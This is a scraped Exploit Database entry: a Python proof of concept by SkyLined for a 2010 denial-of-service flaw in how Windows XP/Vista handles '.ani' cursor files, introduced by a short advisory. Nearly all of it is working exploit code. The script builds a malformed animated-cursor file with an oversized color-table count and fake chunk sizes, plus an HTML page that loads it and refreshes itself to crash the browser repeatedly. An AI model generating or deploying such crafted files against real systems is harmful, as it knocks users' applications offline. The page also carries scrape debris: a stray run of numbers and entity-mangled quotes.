Microsoft Windows XP/Vista – ‘.ani tagBITMAPINFOHEADER’ Denial of Service

• Exploit Database
• 114 阅读

• 作者： Skylined
  日期： 2010-03-08
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33719/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180

  source: https://www.securityfocus.com/bid/38579/info   Microsoft Windows is prone to a remote denial-of-service vulnerability when processing &apos;.ani&apos; files.   Successful exploits will cause the vulnerable applications that use the affected APIs to crash or become unresponsive, denying service to legitimate users.     def Save(name, content): file = open(name, &apos;w&apos;); try: file.write(content); finally: file.close();   def DWord(*values): return DWords(values); def DWords(values): chars = []; for value in values: for i in range(4): byte = (value >> (i * 8)) & 0xFF; chars.append(chr(byte)); return &apos;&apos;.join(chars);   def Word(*values): return Words(values); def Words(values): chars = []; for value in values: for i in range(2): byte = (value >> (i * 8)) & 0xFF; chars.append(chr(byte)); return &apos;&apos;.join(chars);   def Byte(*values): return Bytes(values); def Bytes(values): chars = []; for value in values: chars.append(chr(value)); return &apos;&apos;.join(chars);   def Chunk(type_id, data, fake_size = None): if fake_size is not None: return type_id + DWord(fake_size) + DataOf(data); return type_id + DWord(SizeOf(data)) + DataOf(data);   def Pad2DWords(string): pad = (4 - (len(string) % 4)) % 4; return string + &apos;\0&apos; * pad;   def SizeOf(thing): return len(DataOf(thing));   def DataOf(thing): if type(thing) == str: return thing; elif type(thing) == list: struct_str_list = []; try: for struct_member in thing: struct_str_list.append(DataOf(struct_member)); except: print &apos;Member of %s&apos; % repr(thing); raise; return &apos;&apos;.join(struct_str_list); else: raise AssertionError(&apos;Struct contains data of unhandled type %s&apos; % \ type(thing));   BITMAPINFOHEADER = [ #http://msdn.microsoft.com/en-us/library/aa930622.aspx DWord(0), # biSize; (size of this structure) *SET LATER* DWord(0), # biWidth; DWord(0), # biHeight; Word(0),# biPlanes; Word(0),# biBitCount; DWord(0), # biCompression; DWord(0), # biSizeImage; DWord(0), # biXPelsPerMeter; DWord(0), # biYPelsPerMeter; DWord(0x3F000000),# biClrUsed (size of color table) (< 0x3FFFFFF4 to prevent overflow). DWord(0), # biClrImportant ]; # Set BITMAPINFOHEADER.biSize BITMAPINFOHEADER[0] = DWord(SizeOf(BITMAPINFOHEADER));   RGBQUAD = DWords([ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ]);     ICONIMAGE = [ # http://msdn.microsoft.com/en-us/library/ms997538.aspx BITMAPINFOHEADER,# icHeader; // DIB header RGBQUAD, # icColors[1]; // Color table # BYTEicXOR[1];// DIB bits for XOR mask # BYTEicAND[1];// DIB bits for AND mask ];   ICONDIR = [ # http://msdn.microsoft.com/en-us/library/ms997538.aspx Word(0), # idReserved Word(1), # idType (1=.ICO, 2=.CUR) Word(1), # idCount (number of images) ];   ICONDIRENTRY = [ # http://msdn.microsoft.com/en-us/library/ms997538.aspx Byte(0x20), # bWidth Byte(0x20), # bHeight Byte(0x0),# bColorCount Byte(0),# bReserved (must be 0) Word(0),# wPlanes (color planes) Word(0),# wBitCount (bits per pixel) DWord(0), # dwBytesInRes (bitmap resource size) DWord(0), # dwImageOffset (bitmap offset in this file) *SET LATER* ]; # Set ICONDIRENTRY.dwImageOffset: ICONDIRENTRY[6] = DWord(SizeOf(ICONIMAGE)); ICONDIRENTRY[7] = DWord(SizeOf(ICONDIR) + SizeOf(ICONDIRENTRY));   icon_chunk = Chunk(&apos;icon&apos;, ICONDIR + ICONDIRENTRY + ICONIMAGE);   fram_data = &apos;fram&apos; + icon_chunk;   list_fram_chunk = Chunk(&apos;LIST&apos;, fram_data, 0x231C);   anih_cFrames = 0x01; anih_cSteps = 0x01; anih_cx = 0; anih_cy = 0; anih_cBitCount = 0x00; anih_cPlanes = 0x01; anih_JifRate = 0x0C; anih_flags = 0x01; # The first DWORD is the length, which we don&apos;t know yet: anih_struct = [ DWord(0),# length of structure, to be set later. DWord(1),# cFrames DWord(1),# cSteps DWord(0),# cx (must be 0) DWord(0),# cy (must be 0) DWord(0),# cBitCount DWord(1),# cPlanes DWord(0xC),# JifRate DWord(1),# flags (1 = AF_ICON ]; # Set the length of the structure: anih_struct[0] = DWord(SizeOf(anih_struct)); anih_chunk = Chunk(&apos;anih&apos;, anih_struct);   inam_data = Pad2DWords(&apos;MSIE 8.0 .ANI vulnerability\0&apos;); inam_chunk = Chunk(&apos;INAM&apos;, inam_data);   iart_data = Pad2DWords(&apos;SkyLined http://skypher.com\0&apos;); iart_chunk = Chunk(&apos;IART&apos;, iart_data);   info_chunk = &apos;INFO&apos; + inam_chunk + iart_chunk; list_info_chunk = Chunk(&apos;LIST&apos;, info_chunk);   acon_chunk = &apos;ACON&apos; + list_info_chunk + anih_chunk + list_fram_chunk;   riff_chunk = Chunk(&apos;RIFF&apos;, acon_chunk, 0x23A8);   html = &apos;<HEAD><META http-equiv="refresh" content="0"/></HEAD>&apos; + \ &apos;<BODY style="cursor:url(repro.ani)"></BODY>&apos;;   Save(&apos;repro.ani&apos;, riff_chunk); Save(&apos;repro.html&apos;, html);